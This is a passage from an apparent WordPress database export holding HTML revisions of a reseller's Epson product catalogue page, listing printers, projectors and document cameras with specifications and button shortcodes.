performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 09:44:59','2019-09-26 01:44:59','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3486,1,'2019-09-26 10:05:19','2019-09-26 02:05:19','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity 